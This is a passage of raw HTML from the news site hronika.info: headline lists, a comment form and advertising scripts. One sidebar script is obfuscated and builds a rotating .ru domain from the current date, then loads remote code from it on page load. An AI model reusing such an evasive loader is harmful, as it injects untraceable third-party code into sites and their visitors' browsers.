<strong class="ttl" title="Украина отреагировал на отказ Будапешта отозвать консула"><a href="http://hronika.info/ukraina/356180-ukraina-otreagiroval-na-otkaz-budapeshta-otozvat-konsula.html">Украина отреагировал на отказ Будапешта отозвать консула</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/356104-smeshnye-pravila-kotorym-sleduyut-vse-prilichnye-koty.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538399896_pravila.jpg" alt="Смешные правила, которым следуют все "приличные" коты" class="l_n_im" title="Смешные правила, которым следуют все "приличные" коты" />
</a>
<strong class="ttl" title="Смешные правила, которым следуют все "приличные" коты"><a href="http://hronika.info/kurjozy/356104-smeshnye-pravila-kotorym-sleduyut-vse-prilichnye-koty.html">Смешные правила, которым следуют все "приличные" коты</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/356095-tipichnye-rossiyskie-goroda-v-umoritelnyh-fotkah.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538399218_rossiya.jpg" alt="Типичные российские города в уморительных фотках" class="l_n_im" title="Типичные российские города в уморительных фотках" />
</a>
<strong class="ttl" title="Типичные российские города в уморительных фотках"><a href="http://hronika.info/kurjozy/356095-tipichnye-rossiyskie-goroda-v-umoritelnyh-fotkah.html">Типичные российские города в уморительных фотках</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/356090-prikoly-ot-ofisnyh-rabotnikov-s-horoshey-fantaziey.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538398847_ofis.jpg" alt="Приколы от офисных работников с хорошей фантазией" class="l_n_im" title="Приколы от офисных работников с хорошей фантазией" />
</a>
<strong class="ttl" title="Приколы от офисных работников с хорошей фантазией"><a href="http://hronika.info/kurjozy/356090-prikoly-ot-ofisnyh-rabotnikov-s-horoshey-fantaziey.html">Приколы от офисных работников с хорошей фантазией</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/356125-vernyy-drug-krolik-proslavilsya-pomogaya-koshke-vybratsya-iz-lovushki.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538402558_krolik1.jpg" alt="Верный друг: кролик прославился, помогая кошке выбраться из ловушки" class="l_n_im" title="Верный друг: кролик прославился, помогая кошке выбраться из ловушки" />
</a>
<strong class="ttl" title="Верный друг: кролик прославился, помогая кошке выбраться из ловушки"><a href="http://hronika.info/kurjozy/356125-vernyy-drug-krolik-proslavilsya-pomogaya-koshke-vybratsya-iz-lovushki.html">Верный друг: кролик прославился, помогая кошке выбраться из ловушки</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/356117-na-donbasse-podorvalsya-btr-s-terroristami-gur.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538401234_btr.jpg" alt="На Донбассе подорвался БТР с террористами, - ГУР" class="l_n_im" title="На Донбассе подорвался БТР с террористами, - ГУР" />
</a>
<strong class="ttl" title="На Донбассе подорвался БТР с террористами, - ГУР"><a href="http://hronika.info/ukraina/356117-na-donbasse-podorvalsya-btr-s-terroristami-gur.html">На Донбассе подорвался БТР с террористами, - ГУР</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/356134-set-nasmeshila-reakciya-sobaki-na-nakazanie-hozyaina.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538403543_sobak.jpg" alt="Сеть насмешила реакция собаки на «наказание» хозяина" class="l_n_im" title="Сеть насмешила реакция собаки на «наказание» хозяина" />
</a>
<strong class="ttl" title="Сеть насмешила реакция собаки на «наказание» хозяина"><a href="http://hronika.info/kurjozy/356134-set-nasmeshila-reakciya-sobaki-na-nakazanie-hozyaina.html">Сеть насмешила реакция собаки на «наказание» хозяина</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/mnenia/355817-kto-stanet-prezidentom-ukrainy.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/1538317399_kirill-sazonov.jpg" alt="Кто станет президентом Украины" class="l_n_im" title="Кто станет президентом Украины" />
</a>
<strong class="ttl" title="Кто станет президентом Украины"><a href="http://hronika.info/mnenia/355817-kto-stanet-prezidentom-ukrainy.html">Кто станет президентом Украины</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/356119-yaponcy-nashli-liftu-nelepoe-primenenie.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538401707_lift.jpg" alt="Японцы нашли лифту нелепое применение" class="l_n_im" title="Японцы нашли лифту нелепое применение" />
</a>
<strong class="ttl" title="Японцы нашли лифту нелепое применение"><a href="http://hronika.info/kurjozy/356119-yaponcy-nashli-liftu-nelepoe-primenenie.html">Японцы нашли лифту нелепое применение</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/mnenia/355816-timoshenko-kak-oficialnyy-predstavitel-gazproma.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1538317303_sergey-fursa.jpg" alt="Тимошенко как официальный представитель Газпрома" class="l_n_im" title="Тимошенко как официальный представитель Газпрома" />
</a>
<strong class="ttl" title="Тимошенко как официальный представитель Газпрома"><a href="http://hronika.info/mnenia/355816-timoshenko-kak-oficialnyy-predstavitel-gazproma.html">Тимошенко как официальный представитель Газпрома</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/356089-medvedica-ostavila-amerikanca-bez-posylki.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538398664_medved2.jpg" alt="Медведица оставила американца без посылки" class="l_n_im" title="Медведица оставила американца без посылки" />
</a>
<strong class="ttl" title="Медведица оставила американца без посылки"><a href="http://hronika.info/kurjozy/356089-medvedica-ostavila-amerikanca-bez-posylki.html">Медведица оставила американца без посылки</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/mnenia/355815-timoshenko-gazprom-ta-nteresi-kremlya.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/1538317209_viktor-ukolov.jpg" alt="Тимошенко, Газпром та інтереси Кремля" class="l_n_im" title="Тимошенко, Газпром та інтереси Кремля" />
</a>
<strong class="ttl" title="Тимошенко, Газпром та інтереси Кремля"><a href="http://hronika.info/mnenia/355815-timoshenko-gazprom-ta-nteresi-kremlya.html">Тимошенко, Газпром та інтереси Кремля</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/356077-strannyy-motylek-stal-novym-internet-memom.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538396800_memy.jpeg" alt="Странный мотылек стал новым интернет-мемом" class="l_n_im" title="Странный мотылек стал новым интернет-мемом" />
</a>
<strong class="ttl" title="Странный мотылек стал новым интернет-мемом"><a href="http://hronika.info/kurjozy/356077-strannyy-motylek-stal-novym-internet-memom.html">Странный мотылек стал новым интернет-мемом</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/356067-set-ozadachila-strannaya-detskaya-zadachka.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538395214_zadacha.png" alt="Сеть озадачила странная детская задачка" class="l_n_im" title="Сеть озадачила странная детская задачка" />
</a>
<strong class="ttl" title="Сеть озадачила странная детская задачка"><a href="http://hronika.info/kurjozy/356067-set-ozadachila-strannaya-detskaya-zadachka.html">Сеть озадачила странная детская задачка</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/mnenia/355814-pro-sinhronzacyu-roboti-luganskoyi-tes.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1538317109_dmitriy-snegirev.jpg" alt="Про синхронізацію роботи Луганської ТЕС" class="l_n_im" title="Про синхронізацію роботи Луганської ТЕС" />
</a>
<strong class="ttl" title="Про синхронізацію роботи Луганської ТЕС"><a href="http://hronika.info/mnenia/355814-pro-sinhronzacyu-roboti-luganskoyi-tes.html">Про синхронізацію роботи Луганської ТЕС</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/mnenia/355813-delo-ne-v-tom-chto-ekonomika-rossii-ruhnet.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1538317055_anders-aslund.jpg" alt="Дело не в том, что экономика России рухнет" class="l_n_im" title="Дело не в том, что экономика России рухнет" />
</a>
<strong class="ttl" title="Дело не в том, что экономика России рухнет"><a href="http://hronika.info/mnenia/355813-delo-ne-v-tom-chto-ekonomika-rossii-ruhnet.html">Дело не в том, что экономика России рухнет</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/356038-socseti-podnyali-na-smeh-knigu-mudrostey-ot-putina.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538390885_knigi.jpg" alt="Соцсети подняли на смех книгу «мудростей от Путина»" class="l_n_im" title="Соцсети подняли на смех книгу «мудростей от Путина»" />
</a>
<strong class="ttl" title="Соцсети подняли на смех книгу «мудростей от Путина»"><a href="http://hronika.info/kurjozy/356038-socseti-podnyali-na-smeh-knigu-mudrostey-ot-putina.html">Соцсети подняли на смех книгу «мудростей от Путина»</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/mnenia/355812-peregovory-s-mvf-imeni-shredingera.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1538316981_sergey-fursa.jpg" alt="Переговоры с МВФ имени Шредингера" class="l_n_im" title="Переговоры с МВФ имени Шредингера" />
</a>
<strong class="ttl" title="Переговоры с МВФ имени Шредингера"><a href="http://hronika.info/mnenia/355812-peregovory-s-mvf-imeni-shredingera.html">Переговоры с МВФ имени Шредингера</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/356019-poklonnikam-boev-bez-pravil-prishlos-smotret-multik-o-svinke-peppe.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538386840_multik.jpg" alt="Поклонникам боев без правил пришлось смотреть мультик о свинке Пеппе" class="l_n_im" title="Поклонникам боев без правил пришлось смотреть мультик о свинке Пеппе" />
</a>
<strong class="ttl" title="Поклонникам боев без правил пришлось смотреть мультик о свинке Пеппе"><a href="http://hronika.info/kurjozy/356019-poklonnikam-boev-bez-pravil-prishlos-smotret-multik-o-svinke-peppe.html">Поклонникам боев без правил пришлось смотреть мультик о свинке Пеппе</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/mnenia/355811-chto-pokazala-akciya-noch-na-bankovoy.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/1538316938_mustafa-nayem.jpg" alt="Что показала акция «Ночь на Банковой»" class="l_n_im" title="Что показала акция «Ночь на Банковой»" />
</a>
<strong class="ttl" title="Что показала акция «Ночь на Банковой»"><a href="http://hronika.info/mnenia/355811-chto-pokazala-akciya-noch-na-bankovoy.html">Что показала акция «Ночь на Банковой»</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/355975-v-nikolaeve-direktor-rynka-izbil-deputata.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538381038_izbienie.jpg" alt="В Николаеве директор рынка избил депутата" class="l_n_im" title="В Николаеве директор рынка избил депутата" />
</a>
<strong class="ttl" title="В Николаеве директор рынка избил депутата"><a href="http://hronika.info/ukraina/355975-v-nikolaeve-direktor-rynka-izbil-deputata.html">В Николаеве директор рынка избил депутата</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/356003-vot-eto-fantaziya-rossmi-otyskali-svyaz-mezhdu-kievskoy-siney-rukoy-i-fashistami.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538384848_ruka.jpg" alt="Вот это фантазия: росСМИ отыскали связь между киевской «синей рукой» и фашистами" class="l_n_im" title="Вот это фантазия: росСМИ отыскали связь между киевской «синей рукой» и фашистами" />
</a>
<strong class="ttl" title="Вот это фантазия: росСМИ отыскали связь между киевской «синей рукой» и фашистами"><a href="http://hronika.info/kurjozy/356003-vot-eto-fantaziya-rossmi-otyskali-svyaz-mezhdu-kievskoy-siney-rukoy-i-fashistami.html">Вот это фантазия: росСМИ отыскали связь между киевской «синей рукой» и фашистами</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/mnenia/355810-likvidaciya-naftogaza-i-timoshenko.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1538316927_karl-voloh.jpg" alt="Ликвидация «Нафтогаза» и Тимошенко" class="l_n_im" title="Ликвидация «Нафтогаза» и Тимошенко" />
</a>
<strong class="ttl" title="Ликвидация «Нафтогаза» и Тимошенко"><a href="http://hronika.info/mnenia/355810-likvidaciya-naftogaza-i-timoshenko.html">Ликвидация «Нафтогаза» и Тимошенко</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/355964-na-donetchine-postroili-190-metrovuyu-televyshku.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538379703_televyshka.jpg" alt="На Донетчине построили 190-метровую телевышку" class="l_n_im" title="На Донетчине построили 190-метровую телевышку" />
</a>
<strong class="ttl" title="На Донетчине построили 190-метровую телевышку"><a href="http://hronika.info/ukraina/355964-na-donetchine-postroili-190-metrovuyu-televyshku.html">На Донетчине построили 190-метровую телевышку</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/355990-set-nasmeshil-putin-zachitavshiysya-tomikom-pushkina.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538382767_putin.jpg" alt="Сеть насмешил Путин, «зачитавшийся» томиком Пушкина" class="l_n_im" title="Сеть насмешил Путин, «зачитавшийся» томиком Пушкина" />
</a>
<strong class="ttl" title="Сеть насмешил Путин, «зачитавшийся» томиком Пушкина"><a href="http://hronika.info/kurjozy/355990-set-nasmeshil-putin-zachitavshiysya-tomikom-pushkina.html">Сеть насмешил Путин, «зачитавшийся» томиком Пушкина</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/mnenia/355809-v-preddverii-prezidentskih-vyborov-nas-pugayut-revanshem.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/1538316817_sergey-leschenko.jpg" alt="В преддверии президентских выборов нас пугают реваншем" class="l_n_im" title="В преддверии президентских выборов нас пугают реваншем" />
</a>
<strong class="ttl" title="В преддверии президентских выборов нас пугают реваншем"><a href="http://hronika.info/mnenia/355809-v-preddverii-prezidentskih-vyborov-nas-pugayut-revanshem.html">В преддверии президентских выборов нас пугают реваншем</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/355944-v-ukraine-startoval-osenniy-prizyv-na-srochnuyu-sluzhbu.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538377940_prizyv.jpg" alt="В Украине стартовал осенний призыв на срочную службу" class="l_n_im" title="В Украине стартовал осенний призыв на срочную службу" />
</a>
<strong class="ttl" title="В Украине стартовал осенний призыв на срочную службу"><a href="http://hronika.info/ukraina/355944-v-ukraine-startoval-osenniy-prizyv-na-srochnuyu-sluzhbu.html">В Украине стартовал осенний призыв на срочную службу</a></strong>
</li></ul>
        </div>
        <a class="buttons next" href="#"></a> 
      </div>
    </div>
</div>

<br />
<div id="comments_tab"><b>Оставьте свой комментарий</b>
<!--  <ul class="tabs">
  <li>
    <a href="#hronika">Хроника</a>
  </li>
<li>
    <a href="#vkontakte">Вконтакте</a>
  </li> 
  <li>
    <a href="#facebook">Фейсбук</a>
  </li>
</ul> -->
<div class="clr">
  <div id="hronika">
<form  method="post" name="dle-comments-form" id="dle-comments-form" action="/mir/356212-u-pravitelstvennogo-zdaniya-v-barselone-proshli-stychki.html"><br />
<div class="baseform addcomfrm">
	<table class="tableform">
		
		<tr>
			<td class="label">
				Имя:<span class="impot">*&nbsp;&nbsp;</span>
				<input type="text" name="name" id="name" class="f_input" />
			</td>
		</tr>
		<tr>	
			<td class="label">E-Mail:<input type="text" name="mail" id="mail" class="f_input" style="margin-left:8px" /></td>
		</tr>
		
		<tr>	
			<td class="editorcomm"><script type="text/javascript">
<!--
var text_enter_url       = "Введите полный URL ссылки";
var text_enter_size       = "Введите размеры флэш ролика (ширина, высота)";
var text_enter_flash       = "Введите ссылку на флэш ролик";
var text_enter_page      = "Введите номер страницы";
var text_enter_url_name  = "Введите описание ссылки";
var text_enter_page_name = "Введите описание ссылки";
var text_enter_image    = "Введите полный URL изображения";
var text_enter_email    = "Введите e-mail адрес";
var text_code           = "Использование: [CODE] Здесь Ваш код.. [/CODE]";
var text_quote          = "Использование: [QUOTE] Здесь Ваша Цитата.. [/QUOTE]";
var text_upload         = "Загрузка файлов и изображений на сервер";
var error_no_url        = "Вы должны ввести URL";
var error_no_title      = "Вы должны ввести название";
var error_no_email      = "Вы должны ввести e-mail адрес";
var prompt_start        = "Введите текст для форматирования";
var img_title   		= "Введите по какому краю выравнивать картинку (left, center, right)";
var email_title  	    = "Введите описание ссылки";
var text_pages  	    = "Страница";
var image_align  	    = "left";
var bb_t_emo  	        = "Вставка смайликов";
var bb_t_col  	        = "Цвет:";
var text_enter_list     = "Введите пункт списка. Для завершения ввода оставьте поле пустым.";
var text_alt_image      = "Введите описание изображения";
var img_align  	        = "Выравнивание";
var img_align_sel  	    = "<select name='dleimagealign' id='dleimagealign' class='ui-widget-content ui-corner-all'><option value='' >Нет</option><option value='left' selected>По левому краю</option><option value='right' >По правому краю</option><option value='center' >По центру</option></select>";

var selField  = "comments";
var fombj    = document.getElementById( 'dle-comments-form' );
-->
</script>
<div class="bb-editor">
<div class="bb-pane" onmouseenter="if(is_ie9) get_sel(eval('fombj.'+ selField));">
<b id="b_b" class="bb-btn" onclick="simpletag('b')" title="Полужирный">Полужирный</b>
<b id="b_i" class="bb-btn" onclick="simpletag('i')" title="Наклонный текст">Наклонный текст</b>
<b id="b_u" class="bb-btn" onclick="simpletag('u')" title="Подчёркнутый текст">Подчёркнутый текст</b>
<b id="b_s" class="bb-btn" onclick="simpletag('s')" title="Зачёркнутый текст">Зачёркнутый текст</b>
<span class="bb-sep">|</span>
<b id="b_left" class="bb-btn" onclick="simpletag('left')" title="Выравнивание по левому краю">Выравнивание по левому краю</b>
<b id="b_center" class="bb-btn" onclick="simpletag('center')" title="По центру">По центру</b>
<b id="b_right" class="bb-btn" onclick="simpletag('right')" title="Выравнивание по правому краю">Выравнивание по правому краю</b>
<span class="bb-sep">|</span>
<b id="b_emo" class="bb-btn" onclick="ins_emo(this)" title="Вставка смайликов">Вставка смайликов</b>


<b id="b_color" class="bb-btn" onclick="ins_color(this)" title="Выбор цвета">Выбор цвета</b>
<span class="bb-sep">|</span>
<b id="b_hide" class="bb-btn" onclick="simpletag('hide')" title="Скрытый текст">Скрытый текст</b>
<b id="b_quote" class="bb-btn" onclick="simpletag('quote')" title="Вставка цитаты">Вставка цитаты</b>
<b id="b_tnl" class="bb-btn" onclick="translit()" title="Преобразовать выбранный текст из транслитерации в кириллицу">Преобразовать выбранный текст из транслитерации в кириллицу</b>
<b id="b_spoiler" class="bb-btn" onclick="simpletag('spoiler')" title="Вставка спойлера">Вставка спойлера</b>
</div>
<div id="dle_emos" style="display: none;" title="Вставка смайликов"><div style="width:100%;height:100%;overflow: auto;"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':wink:'); return false;"><img style="border: none;" alt="wink" src="http://hronika.info/engine/data/emoticons/wink.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':winked:'); return false;"><img style="border: none;" alt="winked" src="http://hronika.info/engine/data/emoticons/winked.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':smile:'); return false;"><img style="border: none;" alt="smile" src="http://hronika.info/engine/data/emoticons/smile.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':am:'); return false;"><img style="border: none;" alt="am" src="http://hronika.info/engine/data/emoticons/am.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':belay:'); return false;"><img style="border: none;" alt="belay" src="http://hronika.info/engine/data/emoticons/belay.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':feel:'); return false;"><img style="border: none;" alt="feel" src="http://hronika.info/engine/data/emoticons/feel.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':fellow:'); return false;"><img style="border: none;" alt="fellow" src="http://hronika.info/engine/data/emoticons/fellow.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':laughing:'); return false;"><img style="border: none;" alt="laughing" src="http://hronika.info/engine/data/emoticons/laughing.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':lol:'); return false;"><img style="border: none;" alt="lol" src="http://hronika.info/engine/data/emoticons/lol.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':love:'); return false;"><img style="border: none;" alt="love" src="http://hronika.info/engine/data/emoticons/love.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':no:'); return false;"><img style="border: none;" alt="no" src="http://hronika.info/engine/data/emoticons/no.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':recourse:'); return false;"><img style="border: none;" alt="recourse" src="http://hronika.info/engine/data/emoticons/recourse.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':request:'); return false;"><img style="border: none;" alt="request" src="http://hronika.info/engine/data/emoticons/request.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':sad:'); return false;"><img style="border: none;" alt="sad" src="http://hronika.info/engine/data/emoticons/sad.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':tongue:'); return false;"><img style="border: none;" alt="tongue" src="http://hronika.info/engine/data/emoticons/tongue.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':wassat:'); return false;"><img style="border: none;" alt="wassat" src="http://hronika.info/engine/data/emoticons/wassat.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':crying:'); return false;"><img style="border: none;" alt="crying" src="http://hronika.info/engine/data/emoticons/crying.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':what:'); return false;"><img style="border: none;" alt="what" src="http://hronika.info/engine/data/emoticons/what.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':bully:'); return false;"><img style="border: none;" alt="bully" src="http://hronika.info/engine/data/emoticons/bully.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':angry:'); return false;"><img style="border: none;" alt="angry" src="http://hronika.info/engine/data/emoticons/angry.gif" /></a></td></tr></table></div></div>
<textarea name="comments" id="comments" cols="70" rows="10" onfocus="setNewField(this.name, document.getElementById( 'dle-comments-form' ))"></textarea>
</div></td>
		</tr>
			
			
		<tr>		
			<td class="label">Введите код: <span class="impot">*</span></td>	
			<td>	
				<div><span id="dle-captcha"><img src="/engine/modules/antibot/antibot.php" alt="Включите эту картинку для отображения кода безопасности" width="160" height="80" /><br /><a onclick="reload(); return false;" href="#">обновить, если не виден код</a></span></div>	
				<div><input type="text" name="sec_code" id="sec_code" style="width:115px" class="f_input" /></div>
			</td>	
		</tr>	
			
			
	</table>
	<br />
</div>
	<div class="fieldsubmit" style=" position: relative; width: 100%; height: 23px; top: -10px; ">	
		<button type="submit" name="submit" class="fbutton addcombut"><span>Добавить</span></button>
	</div>

		<input type="hidden" name="subaction" value="addcomment" />
		<input type="hidden" name="post_id" id="post_id" value="356212" /></form><script type="text/javascript">
<!--
$(function(){

	$('#dle-comments-form').submit(function() {
	  doAddComments();
	  return false;
	});

});

function reload () {

	var rndval = new Date().getTime(); 

	document.getElementById('dle-captcha').innerHTML = '<img src="/engine/modules/antibot/antibot.php?rndval=' + rndval + '" width="160" height="80" alt="" /><br /><a onclick="reload(); return false;" href="#">обновить, если не виден код</a>';

};
//-->
</script>
  </div>

  <!--
  <div id="vkontakte">


<script type="text/javascript" src="//vk.com/js/api/openapi.js?98"></script>

<script type="text/javascript">
  VK.init({apiId: 3098550, onlyWidgets: true});
</script>


<div id="vk_comments"></div>
<script type="text/javascript">
VK.Widgets.Comments("vk_comments", {limit: 10, width: "100%", attach: "*"});
</script>
      
  </div>
  <div id="facebook">
<div class="fb-comments" data-href="http://hronika.info/mir/356212-u-pravitelstvennogo-zdaniya-v-barselone-proshli-stychki.html" data-width="410"></div>      
  </div>
  -->
  </div> 
</div>
 
<div id="dle-ajax-comments"></div>

<!--dlenavigationcomments-->
<div class="clr"><br /></div>
</div>
<div id='_mwayss-13a2bf393830a24cb00f9b493f869072'></div>
                <script>      
                    (function(window, document, undefined) {
                        var script_tag = document.createElement('script');
                        script_tag.src = 'https://ad.mediawayss.com/ad/mwayss_invocation.min.js?pzoneid=1171&height=288&width=512&tld=hronika.info&ctype=div&ch=DOMAIN_HERE';
                        var container = document.getElementById('_mwayss-13a2bf393830a24cb00f9b493f869072');    
                        container.parentNode.insertBefore(script_tag, container);
                    })(window, document);
                </script>
<script>
$.ctrl = function(key, callback, args) {
    var isCtrl = false;
    $(document).keydown(function(e) {
        if(!args) args=[]; 
        isCtrl = e.ctrlKey;
        if((e.keyCode == key.charCodeAt(0) || e.keyCode == 45) && isCtrl) callback.apply(this, args);
    }).keyup(function(e) {
        if(e.ctrlKey) isCtrl = false;
    });        
};
$.ctrl('C', function() {
    $('body').prepend("<div id='ctrl_c' class='ctrl_c' align='justify'><span>&times;</span>Использование материалов и новостей с сайта <a style='font-size: 11px;' href='http://hronika.info'>hronika.info</a> разрешается только при условии размещения прямой, открытой для поисковых систем, гиперссылки на опубликованную или цитируемую новость.</div>");
    $("#ctrl_c > span").click( function() { $("#ctrl_c").remove(); });

	
ns4 = (document.layers)? true:false
ie4 = (document.all)? true:false

function mousemove(event) {
        var mouse_x = y = 0;
    if (document.attachEvent != null) {
        mouse_x = window.event.clientX;
        mouse_y = window.event.clientY;
    } else if (!document.attachEvent && document.addEventListener) {
        mouse_x = event.clientX;
        mouse_y = event.clientY;
    }
    
}

    document.onmousemove=mousemove;

});

$(document).ready(function(){
var fimg=$(".ax-full img").first();
fimg.css({"width":"200px","height":"150px"});
});
</script>
</div></article>
            </div>
          </div>

             <aside id="sideRight2"><!---->

         <!-- 
		 <div class="wrap"> 
         	
         -->

<div class="row-600">
    <div class="col-336">
        <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="3119660949"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
    </div>
    <div class="col-260">
       <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10484">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10484/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
        
    </div>
</div>



<div class="clr"></div>

<div class="width49-4 fleft">  
            <div class="wrap">
            <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10493">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10493/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
            <div id='tau92omicron6749'></div>
<script type='text/javascript'>(function(){function f(v){return Math.abs(v.split('').reduce(function(w,x){return w=(w<<5)-w+x.charCodeAt(0),w&w},0))}function g(v){return(26<=v?g((v/26>>0)-1):'')+'abcdefghijklmnopqrstuvwxyz'[v%26>>0]}var j=673873,r=''+Math.ceil((Date.now()-1.5147648e12)/6.048e8)*j,p=6749,l=''+j+''+p,t=document;p=t.createElement('script'),p.type='text/javascript',p.src='//'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+'.ru/'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+l+'.js',t.getElementById('tau92omicron6749').appendChild(p)})();</script>
            <div id="MIXADV_4786" class="MIXADVERT_NET"></div>
          <script> 
          var node4786 = document.getElementById("MIXADV_4786");
          if( node4786 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=4786&r="+Math.random();
               node4786.parentNode.appendChild(script); 
               script.onerror = function(){
